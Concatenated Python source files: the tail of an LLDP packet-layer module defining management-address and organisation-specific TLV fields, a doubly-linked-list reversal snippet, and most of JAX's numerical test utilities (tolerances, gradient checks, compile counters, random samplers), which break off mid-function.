SUBTYPE_MANAGEMENT_ADDRESS_NSAP = 0x03
SUBTYPE_MANAGEMENT_ADDRESS_HDLC = 0x04
SUBTYPE_MANAGEMENT_ADDRESS_BBN = 0x05
SUBTYPE_MANAGEMENT_ADDRESS_802 = 0x06
SUBTYPE_MANAGEMENT_ADDRESS_E_163 = 0x07
SUBTYPE_MANAGEMENT_ADDRESS_E_164 = 0x08
SUBTYPE_MANAGEMENT_ADDRESS_F_69 = 0x09
SUBTYPE_MANAGEMENT_ADDRESS_X_121 = 0x0A
SUBTYPE_MANAGEMENT_ADDRESS_IPX = 0x0B
SUBTYPE_MANAGEMENT_ADDRESS_APPLETALK = 0x0C
SUBTYPE_MANAGEMENT_ADDRESS_DECNET_IV = 0x0D
SUBTYPE_MANAGEMENT_ADDRESS_BANYAN_VINES = 0x0E
SUBTYPE_MANAGEMENT_ADDRESS_E_164_WITH_NSAP = 0x0F
SUBTYPE_MANAGEMENT_ADDRESS_DNS = 0x10
SUBTYPE_MANAGEMENT_ADDRESS_DISTINGUISHED_NAME = 0x11
SUBTYPE_MANAGEMENT_ADDRESS_AS_NUMBER = 0x12
SUBTYPE_MANAGEMENT_ADDRESS_XTP_OVER_IPV4 = 0x13
SUBTYPE_MANAGEMENT_ADDRESS_XTP_OVER_IPV6 = 0x14
SUBTYPE_MANAGEMENT_ADDRESS_XTP_NATIVE_MODE_XTP = 0x15
SUBTYPE_MANAGEMENT_ADDRESS_FIBER_CHANNEL_WORLD_WIDE_PORT_NAME = 0x16
SUBTYPE_MANAGEMENT_ADDRESS_FIBER_CHANNEL_WORLD_WIDE_NODE_NAME = 0x17
SUBTYPE_MANAGEMENT_ADDRESS_GWID = 0x18
SUBTYPE_MANAGEMENT_ADDRESS_AFI_FOR_L2VPN = 0x19
SUBTYPE_MANAGEMENT_ADDRESS_MPLS_TP_SECTION_ENDPOINT_ID = 0x1A
SUBTYPE_MANAGEMENT_ADDRESS_MPLS_TP_LSP_ENDPOINT_ID = 0x1B
SUBTYPE_MANAGEMENT_ADDRESS_MPLS_TP_PSEUDOWIRE_ENDPOINT_ID = 0x1C
SUBTYPE_MANAGEMENT_ADDRESS_MT_IP_MULTI_TOPOLOGY_IPV4 = 0x1D
SUBTYPE_MANAGEMENT_ADDRESS_MT_IP_MULTI_TOPOLOGY_IPV6 = 0x1E
INTERFACE_NUMBERING_SUBTYPES = {
0x01: 'unknown',
0x02: 'ifIndex',
0x03: 'system port number'
}
SUBTYPE_INTERFACE_NUMBER_UNKNOWN = 0x01
SUBTYPE_INTERFACE_NUMBER_IF_INDEX = 0x02
SUBTYPE_INTERFACE_NUMBER_SYSTEM_PORT_NUMBER = 0x03
'''
Note - calculation of _length field::
_length = 1@_management_address_string_length +
1@management_address_subtype +
management_address.len +
1@interface_numbering_subtype +
4@interface_number +
1@_oid_string_length +
object_id.len
'''
fields_desc = [
BitEnumField('_type', 0x08, 7, LLDPDU.TYPES),
BitFieldLenField('_length', None, 9, length_of='management_address',
adjust=lambda pkt, x:
8 + len(pkt.management_address) + len(pkt.object_id)),
BitFieldLenField('_management_address_string_length', None, 8,
length_of='management_address',
adjust=lambda pkt, x: len(pkt.management_address) + 1), # noqa: E501
ByteEnumField('management_address_subtype', 0x00,
IANA_ADDRESS_FAMILY_NUMBERS),
XStrLenField('management_address', '',
length_from=lambda pkt: 0
if pkt._management_address_string_length is None else
pkt._management_address_string_length - 1),
ByteEnumField('interface_numbering_subtype',
SUBTYPE_INTERFACE_NUMBER_UNKNOWN,
INTERFACE_NUMBERING_SUBTYPES),
BitField('interface_number', 0, 32),
BitFieldLenField('_oid_string_length', None, 8, length_of='object_id'),
XStrLenField('object_id', '',
length_from=lambda pkt: pkt._oid_string_length),
]
def _check(self):
"""
run layer specific checks
"""
if conf.contribs['LLDP'].strict_mode():
management_address_len = len(self.management_address)
if management_address_len == 0 or management_address_len > 31:
raise LLDPInvalidLengthField(
'management address must be 1..31 characters long - '
'got string of size {}'.format(management_address_len))
class ThreeBytesEnumField(EnumField, ThreeBytesField):
def __init__(self, name, default, enum):
EnumField.__init__(self, name, default, enum, "!I")
class LLDPDUGenericOrganisationSpecific(LLDPDU):
ORG_UNIQUE_CODE_PNO = 0x000ecf
ORG_UNIQUE_CODE_IEEE_802_1 = 0x0080c2
ORG_UNIQUE_CODE_IEEE_802_3 = 0x00120f
ORG_UNIQUE_CODE_TIA_TR_41_MED = 0x0012bb
ORG_UNIQUE_CODE_HYTEC = 0x30b216
ORG_UNIQUE_CODES = {
ORG_UNIQUE_CODE_PNO: "PROFIBUS International (PNO)",
ORG_UNIQUE_CODE_IEEE_802_1: "IEEE 802.1",
ORG_UNIQUE_CODE_IEEE_802_3: "IEEE 802.3",
ORG_UNIQUE_CODE_TIA_TR_41_MED: "TIA TR-41 Committee - Media Endpoint Discovery",  # noqa: E501
ORG_UNIQUE_CODE_HYTEC: "Hytec Geraetebau GmbH"
}
fields_desc = [
BitEnumField('_type', 127, 7, LLDPDU.TYPES),
BitFieldLenField('_length', None, 9, length_of='data', adjust=lambda pkt, x: len(pkt.data) + 4), # noqa: E501
ThreeBytesEnumField('org_code', 0, ORG_UNIQUE_CODES),
ByteField('subtype', 0x00),
XStrLenField('data', '',
length_from=lambda pkt: 0 if pkt._length is None else
pkt._length - 4)
]
# 0x09 .. 0x7e is reserved for future standardization and for now treated as Raw() data # noqa: E501
LLDPDU_CLASS_TYPES = {
0x00: LLDPDUEndOfLLDPDU,
0x01: LLDPDUChassisID,
0x02: LLDPDUPortID,
0x03: LLDPDUTimeToLive,
0x04: LLDPDUPortDescription,
0x05: LLDPDUSystemName,
0x06: LLDPDUSystemDescription,
0x07: LLDPDUSystemCapabilities,
0x08: LLDPDUManagementAddress,
127: LLDPDUGenericOrganisationSpecific
}
class LLDPConfiguration(object):
"""
basic configuration for LLDP layer
"""
def __init__(self):
self._strict_mode = True
self.strict_mode_enable()
def strict_mode_enable(self):
"""
enable strict mode and dissector debugging
"""
self._strict_mode = True
def strict_mode_disable(self):
"""
disable strict mode and dissector debugging
"""
self._strict_mode = False
def strict_mode(self):
"""
get current strict mode state
"""
return self._strict_mode
conf.contribs['LLDP'] = LLDPConfiguration()
bind_layers(Ether, LLDPDU, type=LLDP_ETHER_TYPE)
bind_layers(Dot1Q, LLDPDU, type=LLDP_ETHER_TYPE)
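# Example (sketch, not part of the module): building a minimal, standard-conform
# LLDP frame from the layers defined above:
#
#   frame = (Ether(dst=LLDP_NEAREST_BRIDGE_MAC) /
#            LLDPDUChassisID(subtype=LLDPDUChassisID.SUBTYPE_MAC_ADDRESS,
#                            id='06:05:04:03:02:01') /
#            LLDPDUPortID(subtype=LLDPDUPortID.SUBTYPE_INTERFACE_NAME, id='eth0') /
#            LLDPDUTimeToLive(ttl=120) /
#            LLDPDUEndOfLLDPDU())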
the-stack_106_22024
class DListNode:
def __init__(self, val):
self.val = val
self.prev = self.next = None
def reverse(self, head):
curr = None
while head:
curr = head
head = curr.next
curr.next = curr.prev
curr.prev = head
return curr
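# Example (sketch): reversing a small list a <-> b <-> c
#
#   a, b, c = DListNode(1), DListNode(2), DListNode(3)
#   a.next, b.prev = b, a
#   b.next, c.prev = c, b
#   new_head = a.reverse(a)   # new_head is c; traversal order is now 3, 2, 1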
the-stack_106_22027
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from contextlib import contextmanager
import inspect
import functools
from functools import partial
import re
import os
import textwrap
from typing import Dict, List, Generator, Sequence, Tuple, Union
import unittest
import warnings
import zlib
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
import numpy.random as npr
from jax._src import api
from jax import core
from jax._src import dtypes as _dtypes
from jax import lax
from jax._src.config import flags, bool_env, config
from jax._src.util import prod, unzip2
from jax.tree_util import tree_multimap, tree_all, tree_map, tree_reduce
from jax._src.lib import xla_bridge
from jax._src import dispatch
from jax.interpreters import mlir
from jax.interpreters import xla
from jax.experimental.maps import Mesh
FLAGS = flags.FLAGS
flags.DEFINE_string(
'jax_test_dut', '',
help=
'Describes the device under test in case special consideration is required.'
)
flags.DEFINE_integer(
'num_generated_cases',
int(os.getenv('JAX_NUM_GENERATED_CASES', '10')),
help='Number of generated cases to test')
flags.DEFINE_integer(
'max_cases_sampling_retries',
int(os.getenv('JAX_MAX_CASES_SAMPLING_RETRIES', '100')),
'Number of times a failed test sample should be retried. '
'When an unseen case cannot be generated in this many trials, the '
'sampling process is terminated.'
)
flags.DEFINE_bool(
'jax_skip_slow_tests',
bool_env('JAX_SKIP_SLOW_TESTS', False),
help='Skip tests marked as slow (> 5 sec).'
)
flags.DEFINE_string(
'test_targets', '',
'Regular expression specifying which tests to run, called via re.search on '
'the test name. If empty or unspecified, run all tests.'
)
flags.DEFINE_string(
'exclude_test_targets', '',
'Regular expression specifying which tests NOT to run, called via re.search '
'on the test name. If empty or unspecified, run all tests.'
)
EPS = 1e-4
def _dtype(x):
return (getattr(x, 'dtype', None) or
np.dtype(_dtypes.python_scalar_dtypes.get(type(x), None)) or
np.asarray(x).dtype)
def num_float_bits(dtype):
return _dtypes.finfo(_dtypes.canonicalize_dtype(dtype)).bits
def to_default_dtype(arr):
"""Convert a value to an array with JAX's default dtype.
This is generally used for type conversions of values returned by numpy functions,
to make their dtypes take into account the state of the ``jax_enable_x64`` and
``jax_default_dtype_bits`` flags.
"""
arr = np.asarray(arr)
dtype = _dtypes._default_types.get(arr.dtype.kind)
return arr.astype(_dtypes.canonicalize_dtype(dtype)) if dtype else arr
def with_jax_dtype_defaults(func, use_defaults=True):
"""Return a version of a function with outputs that match JAX's default dtypes.
This is generally used to wrap numpy functions within tests, in order to make
their default output dtypes match those of corresponding JAX functions, taking
into account the state of the ``jax_enable_x64`` and ``jax_default_dtype_bits``
flags.
Args:
use_defaults : whether to convert any given output to the default dtype. May be
a single boolean, in which case it specifies the conversion for all outputs,
or may be a pytree with the same structure as the function output.
"""
@functools.wraps(func)
def wrapped(*args, **kwargs):
result = func(*args, **kwargs)
if isinstance(use_defaults, bool):
return tree_map(to_default_dtype, result) if use_defaults else result
else:
f = lambda arr, use_default: to_default_dtype(arr) if use_default else arr
return tree_map(f, result, use_defaults)
return wrapped
def is_sequence(x):
try:
iter(x)
except TypeError:
return False
else:
return True
_default_tolerance = {
_dtypes.float0: 0,
np.dtype(np.bool_): 0,
np.dtype(np.int8): 0,
np.dtype(np.int16): 0,
np.dtype(np.int32): 0,
np.dtype(np.int64): 0,
np.dtype(np.uint8): 0,
np.dtype(np.uint16): 0,
np.dtype(np.uint32): 0,
np.dtype(np.uint64): 0,
np.dtype(_dtypes.bfloat16): 1e-2,
np.dtype(np.float16): 1e-3,
np.dtype(np.float32): 1e-6,
np.dtype(np.float64): 1e-15,
np.dtype(np.complex64): 1e-6,
np.dtype(np.complex128): 1e-15,
}
def default_tolerance():
if device_under_test() != "tpu":
return _default_tolerance
tol = _default_tolerance.copy()
tol[np.dtype(np.float32)] = 1e-3
tol[np.dtype(np.complex64)] = 1e-3
return tol
default_gradient_tolerance = {
np.dtype(_dtypes.bfloat16): 1e-1,
np.dtype(np.float16): 1e-2,
np.dtype(np.float32): 2e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.complex64): 1e-3,
np.dtype(np.complex128): 1e-5,
}
def _assert_numpy_allclose(a, b, atol=None, rtol=None, err_msg=''):
if a.dtype == b.dtype == _dtypes.float0:
np.testing.assert_array_equal(a, b, err_msg=err_msg)
return
a = a.astype(np.float32) if a.dtype == _dtypes.bfloat16 else a
b = b.astype(np.float32) if b.dtype == _dtypes.bfloat16 else b
kw = {}
if atol: kw["atol"] = atol
if rtol: kw["rtol"] = rtol
with np.errstate(invalid='ignore'):
# TODO(phawkins): surprisingly, assert_allclose sometimes reports invalid
# value errors. It should not do that.
np.testing.assert_allclose(a, b, **kw, err_msg=err_msg)
def tolerance(dtype, tol=None):
tol = {} if tol is None else tol
if not isinstance(tol, dict):
return tol
tol = {np.dtype(key): value for key, value in tol.items()}
dtype = _dtypes.canonicalize_dtype(np.dtype(dtype))
return tol.get(dtype, default_tolerance()[dtype])
def _normalize_tolerance(tol):
tol = tol or 0
if isinstance(tol, dict):
return {np.dtype(k): v for k, v in tol.items()}
else:
return {k: tol for k in _default_tolerance}
def join_tolerance(tol1, tol2):
tol1 = _normalize_tolerance(tol1)
tol2 = _normalize_tolerance(tol2)
out = tol1
for k, v in tol2.items():
out[k] = max(v, tol1.get(k, 0))
return out
def _assert_numpy_close(a, b, atol=None, rtol=None, err_msg=''):
a, b = np.asarray(a), np.asarray(b)
assert a.shape == b.shape
atol = max(tolerance(a.dtype, atol), tolerance(b.dtype, atol))
rtol = max(tolerance(a.dtype, rtol), tolerance(b.dtype, rtol))
_assert_numpy_allclose(a, b, atol=atol * a.size, rtol=rtol * b.size,
err_msg=err_msg)
def check_eq(xs, ys, err_msg=''):
assert_close = partial(_assert_numpy_allclose, err_msg=err_msg)
tree_all(tree_multimap(assert_close, xs, ys))
def check_close(xs, ys, atol=None, rtol=None, err_msg=''):
assert_close = partial(_assert_numpy_close, atol=atol, rtol=rtol,
err_msg=err_msg)
tree_all(tree_multimap(assert_close, xs, ys))
def _check_dtypes_match(xs, ys):
def _assert_dtypes_match(x, y):
if config.x64_enabled:
assert _dtype(x) == _dtype(y)
else:
assert (_dtypes.canonicalize_dtype(_dtype(x)) ==
_dtypes.canonicalize_dtype(_dtype(y)))
tree_all(tree_multimap(_assert_dtypes_match, xs, ys))
def inner_prod(xs, ys):
def contract(x, y):
return np.real(np.dot(np.conj(x).reshape(-1), y.reshape(-1)))
return tree_reduce(np.add, tree_multimap(contract, xs, ys))
def _safe_subtract(x, y, *, dtype):
"""Subtraction that with `inf - inf == 0` semantics."""
with np.errstate(invalid='ignore'):
return np.where(np.equal(x, y), np.array(0, dtype),
np.subtract(x, y, dtype=dtype))
add = partial(tree_multimap, lambda x, y: np.add(x, y, dtype=_dtype(x)))
sub = partial(tree_multimap, lambda x, y: np.subtract(x, y, dtype=_dtype(x)))
safe_sub = partial(tree_multimap,
lambda x, y: _safe_subtract(x, y, dtype=_dtype(x)))
conj = partial(tree_map, lambda x: np.conj(x, dtype=_dtype(x)))
def scalar_mul(xs, a):
def mul(x):
dtype = _dtype(x)
return np.multiply(x, np.array(a, dtype=dtype), dtype=dtype)
return tree_map(mul, xs)
def rand_like(rng, x):
shape = np.shape(x)
dtype = _dtype(x)
randn = lambda: np.asarray(rng.randn(*shape), dtype=dtype)
if _dtypes.issubdtype(dtype, np.complexfloating):
return randn() + dtype.type(1.0j) * randn()
else:
return randn()
def numerical_jvp(f, primals, tangents, eps=EPS):
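# Central finite-difference approximation of the JVP:
# (f(x + eps * v) - f(x - eps * v)) / (2 * eps)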
delta = scalar_mul(tangents, eps)
f_pos = f(*add(primals, delta))
f_neg = f(*sub(primals, delta))
return scalar_mul(safe_sub(f_pos, f_neg), 0.5 / eps)
def _merge_tolerance(tol, default):
if tol is None:
return default
if not isinstance(tol, dict):
return tol
out = default.copy()
for k, v in tol.items():
out[np.dtype(k)] = v
return out
def check_jvp(f, f_jvp, args, atol=None, rtol=None, eps=EPS, err_msg=''):
atol = _merge_tolerance(atol, default_gradient_tolerance)
rtol = _merge_tolerance(rtol, default_gradient_tolerance)
rng = np.random.RandomState(0)
tangent = tree_map(partial(rand_like, rng), args)
v_out, t_out = f_jvp(args, tangent)
_check_dtypes_match(v_out, t_out)
v_out_expected = f(*args)
_check_dtypes_match(v_out, v_out_expected)
t_out_expected = numerical_jvp(f, args, tangent, eps=eps)
# In principle we should expect exact equality of v_out and v_out_expected,
# but due to nondeterminism especially on GPU (e.g., due to convolution
# autotuning) we only require "close".
check_close(v_out, v_out_expected, atol=atol, rtol=rtol,
err_msg=f'{err_msg} primal' if err_msg else 'primal')
check_close(t_out, t_out_expected, atol=atol, rtol=rtol,
err_msg=f'{err_msg} tangent' if err_msg else 'tangent')
def check_vjp(f, f_vjp, args, atol=None, rtol=None, eps=EPS, err_msg=''):
atol = _merge_tolerance(atol, default_gradient_tolerance)
rtol = _merge_tolerance(rtol, default_gradient_tolerance)
_rand_like = partial(rand_like, np.random.RandomState(0))
v_out, vjpfun = f_vjp(*args)
v_out_expected = f(*args)
check_close(v_out, v_out_expected, atol=atol, rtol=rtol,
err_msg=f'{err_msg} primal' if err_msg else 'primal')
tangent = tree_map(_rand_like, args)
tangent_out = numerical_jvp(f, args, tangent, eps=eps)
cotangent = tree_map(_rand_like, v_out)
cotangent_out = conj(vjpfun(conj(cotangent)))
ip = inner_prod(tangent, cotangent_out)
ip_expected = inner_prod(tangent_out, cotangent)
check_close(ip, ip_expected, atol=atol, rtol=rtol,
err_msg=(f'{err_msg} cotangent projection'
if err_msg else 'cotangent projection'))
def check_grads(f, args, order,
modes=("fwd", "rev"), atol=None, rtol=None, eps=None):
"""Check gradients from automatic differentiation against finite differences.
Gradients are only checked in a single randomly chosen direction, which
ensures that the finite difference calculation does not become prohibitively
expensive even for large input/output spaces.
Args:
f: function to check at ``f(*args)``.
args: tuple of argument values.
order: forward and backwards gradients up to this order are checked.
modes: lists of gradient modes to check ('fwd' and/or 'rev').
atol: absolute tolerance for gradient equality.
rtol: relative tolerance for gradient equality.
eps: step size used for finite differences.
Raises:
AssertionError: if gradients do not match.
"""
args = tuple(args)
eps = eps or EPS
_check_jvp = partial(check_jvp, atol=atol, rtol=rtol, eps=eps)
_check_vjp = partial(check_vjp, atol=atol, rtol=rtol, eps=eps)
def _check_grads(f, args, order, err_msg=''):
if "fwd" in modes:
fwd_msg = f'JVP of {err_msg}' if err_msg else 'JVP'
_check_jvp(f, partial(api.jvp, f), args, err_msg=fwd_msg)
if order > 1:
_check_grads(partial(api.jvp, f), (args, args), order - 1, fwd_msg)
if "rev" in modes:
rev_msg = f'VJP of {err_msg}' if err_msg else 'VJP'
_check_vjp(f, partial(api.vjp, f), args, err_msg=rev_msg)
if order > 1:
def f_vjp(*args):
out_primal_py, vjp_py = api.vjp(f, *args)
return vjp_py(out_primal_py)
_check_grads(f_vjp, args, order - 1, rev_msg)
_check_grads(f, args, order)
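# Example (sketch): checking first- and second-order gradients of a scalar function
#
#   check_grads(lambda x: x ** 3, (2.0,), order=2, modes=("fwd", "rev"))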
@contextmanager
def count_device_put():
device_put = dispatch.device_put
count = [0]
def device_put_and_count(*args, **kwargs):
count[0] += 1
return device_put(*args, **kwargs)
dispatch.device_put = device_put_and_count
try:
yield count
finally:
dispatch.device_put = device_put
@contextmanager
def count_primitive_compiles():
dispatch.xla_primitive_callable.cache_clear()
count = [-1]
try:
yield count
finally:
count[0] = dispatch.xla_primitive_callable.cache_info().misses
@contextmanager
def count_jit_and_pmap_compiles():
# No need to clear any caches since we generally jit and pmap fresh callables
# in tests.
xla_jaxpr_subcomp = xla.jaxpr_subcomp
mlir_jaxpr_subcomp = mlir.jaxpr_subcomp
count = [0]
def xla_jaxpr_subcomp_and_count(*args, **kwargs):
count[0] += 1
return xla_jaxpr_subcomp(*args, **kwargs)
def mlir_jaxpr_subcomp_and_count(*args, **kwargs):
count[0] += 1
return mlir_jaxpr_subcomp(*args, **kwargs)
xla.jaxpr_subcomp = xla_jaxpr_subcomp_and_count
mlir.jaxpr_subcomp = mlir_jaxpr_subcomp_and_count
try:
yield count
finally:
xla.jaxpr_subcomp = xla_jaxpr_subcomp
mlir.jaxpr_subcomp = mlir_jaxpr_subcomp
@contextmanager
def assert_num_jit_and_pmap_compilations(times):
with count_jit_and_pmap_compiles() as count:
yield
if count[0] != times:
raise AssertionError(f"Expected exactly {times} XLA compilations, "
f"but executed {count[0]}")
def device_under_test():
return FLAGS.jax_test_dut or xla_bridge.get_backend().platform
def if_device_under_test(device_type: Union[str, Sequence[str]],
if_true, if_false):
"""Chooses `if_true` of `if_false` based on device_under_test."""
if device_under_test() in ([device_type] if isinstance(device_type, str)
else device_type):
return if_true
else:
return if_false
def supported_dtypes():
if device_under_test() == "tpu":
types = {np.bool_, np.int8, np.int16, np.int32, np.uint8, np.uint16,
np.uint32, _dtypes.bfloat16, np.float16, np.float32, np.complex64}
elif device_under_test() == "iree":
types = {np.bool_, np.int8, np.int16, np.int32, np.uint8, np.uint16,
np.uint32, np.float32}
else:
types = {np.bool_, np.int8, np.int16, np.int32, np.int64,
np.uint8, np.uint16, np.uint32, np.uint64,
_dtypes.bfloat16, np.float16, np.float32, np.float64,
np.complex64, np.complex128}
if not config.x64_enabled:
types -= {np.uint64, np.int64, np.float64, np.complex128}
return types
def is_device_rocm():
return xla_bridge.get_backend().platform_version.startswith('rocm')
def is_device_cuda():
return xla_bridge.get_backend().platform_version.startswith('cuda')
def _get_device_tags():
"""returns a set of tags definded for the device under test"""
if is_device_rocm():
device_tags = set([device_under_test(), "rocm"])
elif is_device_cuda():
device_tags = set([device_under_test(), "cuda"])
else:
device_tags = set([device_under_test()])
return device_tags
def skip_on_devices(*disabled_devices):
"""A decorator for test methods to skip the test on certain devices."""
def skip(test_method):
@functools.wraps(test_method)
def test_method_wrapper(self, *args, **kwargs):
device_tags = _get_device_tags()
if device_tags & set(disabled_devices):
test_name = getattr(test_method, '__name__', '[unknown test]')
raise unittest.SkipTest(
f"{test_name} not supported on device with tags {device_tags}.")
return test_method(self, *args, **kwargs)
return test_method_wrapper
return skip
def set_host_platform_device_count(nr_devices: int):
"""Returns a closure that undoes the operation."""
prev_xla_flags = os.getenv("XLA_FLAGS")
flags_str = prev_xla_flags or ""
# Don't override user-specified device count, or other XLA flags.
if "xla_force_host_platform_device_count" not in flags_str:
os.environ["XLA_FLAGS"] = (flags_str +
f" --xla_force_host_platform_device_count={nr_devices}")
# Clear any cached backends so new CPU backend will pick up the env var.
xla_bridge.get_backend.cache_clear()
def undo():
if prev_xla_flags is None:
del os.environ["XLA_FLAGS"]
else:
os.environ["XLA_FLAGS"] = prev_xla_flags
xla_bridge.get_backend.cache_clear()
return undo
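# Example (sketch): simulate 8 host CPU devices for a group of tests, then restore
#
#   undo = set_host_platform_device_count(8)
#   try:
#       ...  # run tests that need multiple devices
#   finally:
#       undo()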
def skip_on_flag(flag_name, skip_value):
"""A decorator for test methods to skip the test when flags are set."""
def skip(test_method): # pylint: disable=missing-docstring
@functools.wraps(test_method)
def test_method_wrapper(self, *args, **kwargs):
flag_value = config._read(flag_name)
if flag_value == skip_value:
test_name = getattr(test_method, '__name__', '[unknown test]')
raise unittest.SkipTest(
f"{test_name} not supported when FLAGS.{flag_name} is {flag_value}")
return test_method(self, *args, **kwargs)
return test_method_wrapper
return skip
def format_test_name_suffix(opname, shapes, dtypes):
arg_descriptions = (format_shape_dtype_string(shape, dtype)
for shape, dtype in zip(shapes, dtypes))
return '{}_{}'.format(opname.capitalize(), '_'.join(arg_descriptions))
# We use special symbols, represented as singleton objects, to distinguish
# between NumPy scalars, Python scalars, and 0-D arrays.
class ScalarShape(object):
def __len__(self): return 0
class _NumpyScalar(ScalarShape): pass
class _PythonScalar(ScalarShape): pass
NUMPY_SCALAR_SHAPE = _NumpyScalar()
PYTHON_SCALAR_SHAPE = _PythonScalar()
def _dims_of_shape(shape):
"""Converts `shape` to a tuple of dimensions."""
if type(shape) in (list, tuple):
return shape
elif isinstance(shape, ScalarShape):
return ()
elif np.ndim(shape) == 0:
return (shape,)
else:
raise TypeError(type(shape))
def _cast_to_shape(value, shape, dtype):
"""Casts `value` to the correct Python type for `shape` and `dtype`."""
if shape is NUMPY_SCALAR_SHAPE:
# explicitly cast to NumPy scalar in case `value` is a Python scalar.
return np.dtype(dtype).type(value)
elif shape is PYTHON_SCALAR_SHAPE:
# explicitly cast to Python scalar via https://stackoverflow.com/a/11389998
return np.asarray(value).item()
elif type(shape) in (list, tuple):
assert np.shape(value) == tuple(shape)
return value
elif np.ndim(shape) == 0:
assert np.shape(value) == (shape,)
return value
else:
raise TypeError(type(shape))
def dtype_str(dtype):
return np.dtype(dtype).name
def format_shape_dtype_string(shape, dtype):
if isinstance(shape, np.ndarray):
return f'{dtype_str(dtype)}[{shape}]'
elif isinstance(shape, list):
shape = tuple(shape)
return _format_shape_dtype_string(shape, dtype)
@functools.lru_cache(maxsize=64)
def _format_shape_dtype_string(shape, dtype):
if shape is NUMPY_SCALAR_SHAPE:
return dtype_str(dtype)
elif shape is PYTHON_SCALAR_SHAPE:
return 'py' + dtype_str(dtype)
elif type(shape) is tuple:
shapestr = ','.join(str(dim) for dim in shape)
return '{}[{}]'.format(dtype_str(dtype), shapestr)
elif type(shape) is int:
return '{}[{},]'.format(dtype_str(dtype), shape)
else:
raise TypeError(type(shape))
def _rand_dtype(rand, shape, dtype, scale=1., post=lambda x: x):
"""Produce random values given shape, dtype, scale, and post-processor.
Args:
rand: a function for producing random values of a given shape, e.g. a
bound version of either np.RandomState.randn or np.RandomState.rand.
shape: a shape value as a tuple of positive integers.
dtype: a numpy dtype.
scale: optional, a multiplicative scale for the random values (default 1).
post: optional, a callable for post-processing the random values (default
identity).
Returns:
An ndarray of the given shape and dtype using random values based on a call
to rand but scaled, converted to the appropriate dtype, and post-processed.
"""
if _dtypes.issubdtype(dtype, np.unsignedinteger):
r = lambda: np.asarray(scale * abs(rand(*_dims_of_shape(shape))), dtype)
else:
r = lambda: np.asarray(scale * rand(*_dims_of_shape(shape)), dtype)
if _dtypes.issubdtype(dtype, np.complexfloating):
vals = r() + 1.0j * r()
else:
vals = r()
return _cast_to_shape(np.asarray(post(vals), dtype), shape, dtype)
def rand_fullrange(rng, standardize_nans=False):
"""Random numbers that span the full range of available bits."""
def gen(shape, dtype, post=lambda x: x):
dtype = np.dtype(dtype)
size = dtype.itemsize * np.prod(_dims_of_shape(shape))
vals = rng.randint(0, np.iinfo(np.uint8).max, size=size, dtype=np.uint8)
vals = post(vals).view(dtype).reshape(shape)
# Non-standard NaNs cause errors in numpy equality assertions.
if standardize_nans and np.issubdtype(dtype, np.floating):
vals[np.isnan(vals)] = np.nan
return _cast_to_shape(vals, shape, dtype)
return gen
def rand_default(rng, scale=3):
return partial(_rand_dtype, rng.randn, scale=scale)
def rand_nonzero(rng):
post = lambda x: np.where(x == 0, np.array(1, dtype=x.dtype), x)
return partial(_rand_dtype, rng.randn, scale=3, post=post)
def rand_positive(rng):
post = lambda x: x + 1
return partial(_rand_dtype, rng.rand, scale=2, post=post)
def rand_small(rng):
return partial(_rand_dtype, rng.randn, scale=1e-3)
def rand_not_small(rng, offset=10.):
post = lambda x: x + np.where(x > 0, offset, -offset)
return partial(_rand_dtype, rng.randn, scale=3., post=post)
def rand_small_positive(rng):
return partial(_rand_dtype, rng.rand, scale=2e-5)
def rand_uniform(rng, low=0.0, high=1.0):
assert low < high
post = lambda x: x * (high - low) + low
return partial(_rand_dtype, rng.rand, post=post)
def rand_some_equal(rng):
def post(x):
x_ravel = x.ravel()
if len(x_ravel) == 0:
return x
flips = rng.rand(*np.shape(x)) < 0.5
return np.where(flips, x_ravel[0], x)
return partial(_rand_dtype, rng.randn, scale=100., post=post)
def rand_some_inf(rng):
"""Return a random sampler that produces infinities in floating types."""
base_rand = rand_default(rng)
# TODO: Complex numbers are not correctly tested
# If blocks should be switched in order, and relevant tests should be fixed
def rand(shape, dtype):
"""The random sampler function."""
if not _dtypes.issubdtype(dtype, np.floating):
# only float types have inf
return base_rand(shape, dtype)
if _dtypes.issubdtype(dtype, np.complexfloating):
base_dtype = np.real(np.array(0, dtype=dtype)).dtype
out = (rand(shape, base_dtype) +
np.array(1j, dtype) * rand(shape, base_dtype))
return _cast_to_shape(out, shape, dtype)
dims = _dims_of_shape(shape)
posinf_flips = rng.rand(*dims) < 0.1
neginf_flips = rng.rand(*dims) < 0.1
vals = base_rand(shape, dtype)
vals = np.where(posinf_flips, np.array(np.inf, dtype=dtype), vals)
vals = np.where(neginf_flips, np.array(-np.inf, dtype=dtype), vals)
return _cast_to_shape(np.asarray(vals, dtype=dtype), shape, dtype)
return rand
def rand_some_nan(rng):
"""Return a random sampler that produces nans in floating types."""
base_rand = rand_default(rng)
def rand(shape, dtype):
"""The random sampler function."""
if _dtypes.issubdtype(dtype, np.complexfloating):
base_dtype = np.real(np.array(0, dtype=dtype)).dtype
out = (rand(shape, base_dtype) +
np.array(1j, dtype) * rand(shape, base_dtype))
return _cast_to_shape(out, shape, dtype)
if not _dtypes.issubdtype(dtype, np.floating):
      # only float types have nan
return base_rand(shape, dtype)
dims = _dims_of_shape(shape)
r = rng.rand(*dims)
nan_flips = r < 0.1
neg_nan_flips = r < 0.05
vals = base_rand(shape, dtype)
vals = np.where(nan_flips, np.array(np.nan, dtype=dtype), vals)
vals = np.where(neg_nan_flips, np.array(-np.nan, dtype=dtype), vals)
return _cast_to_shape(np.asarray(vals, dtype=dtype), shape, dtype)
return rand
def rand_some_inf_and_nan(rng):
"""Return a random sampler that produces infinities in floating types."""
base_rand = rand_default(rng)
# TODO: Complex numbers are not correctly tested
# If blocks should be switched in order, and relevant tests should be fixed
def rand(shape, dtype):
"""The random sampler function."""
if not _dtypes.issubdtype(dtype, np.floating):
# only float types have inf
return base_rand(shape, dtype)
if _dtypes.issubdtype(dtype, np.complexfloating):
base_dtype = np.real(np.array(0, dtype=dtype)).dtype
out = (rand(shape, base_dtype) +
np.array(1j, dtype) * rand(shape, base_dtype))
return _cast_to_shape(out, shape, dtype)
dims = _dims_of_shape(shape)
posinf_flips = rng.rand(*dims) < 0.1
neginf_flips = rng.rand(*dims) < 0.1
